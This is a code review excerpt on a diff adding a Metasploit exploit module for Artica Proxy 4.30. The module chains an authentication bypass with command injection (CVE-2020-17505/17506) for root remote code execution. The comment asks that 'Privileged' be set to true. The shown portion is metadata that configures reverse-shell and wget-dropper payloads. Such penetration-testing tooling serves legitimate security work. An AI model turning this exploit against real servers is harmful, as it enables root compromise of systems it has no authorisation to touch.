modules/exploits/linux/http/artica_proxy_rce.rb

```diff
@@ -0,0 +1,136 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Artica proxy 4.30.000000 Remote Code Execution',
+        'Description' => %q{
+          This module exploits an authenticated command injection vulnerability in Artica Proxy, combined with an authentication bypass
+          discovered on the same version, it is possible to trigger the vulnerability without knowing the credentials.
+          The webserver usually runs as root, successful exploitation of this vulnerability yields remote code execution as root on the
+          remote system.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Max0x4141', # discovery
+            'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # PoC, msf module
+          ],
+        'References' =>
+          [
+            ['CVE', '2020-17505'], # RCE
+            ['CVE', '2020-17506'], # Auth bypass
+            ['URL', 'https://blog.max0x4141.com/post/artica_proxy/'],
+          ],
+        'DefaultOptions' =>
+          {
+            'SSL' => true,
+            'RPort' => 9000
+          },
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'Unix Command',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'Type' => :unix_command,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_bash'
+            }
+          ],
+          [
+            'Linux Dropper',
+            'Platform' => 'linux',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :linux_dropper,
+            'DefaultOptions' => {
+              'CMDSTAGER::FLAVOR' => 'wget',
+              'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+            }
+          ],
+          [
+            'Authentication bypass',
+            'Platform' => 'Linux',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :auth_bypass,
+          ]
+        ],
+        'Privileged' => false,
```

Comment:
As per above, it the web server always runs as `root`, then this is module creates a privileged session.

```suggestion
        'Privileged' => true,
```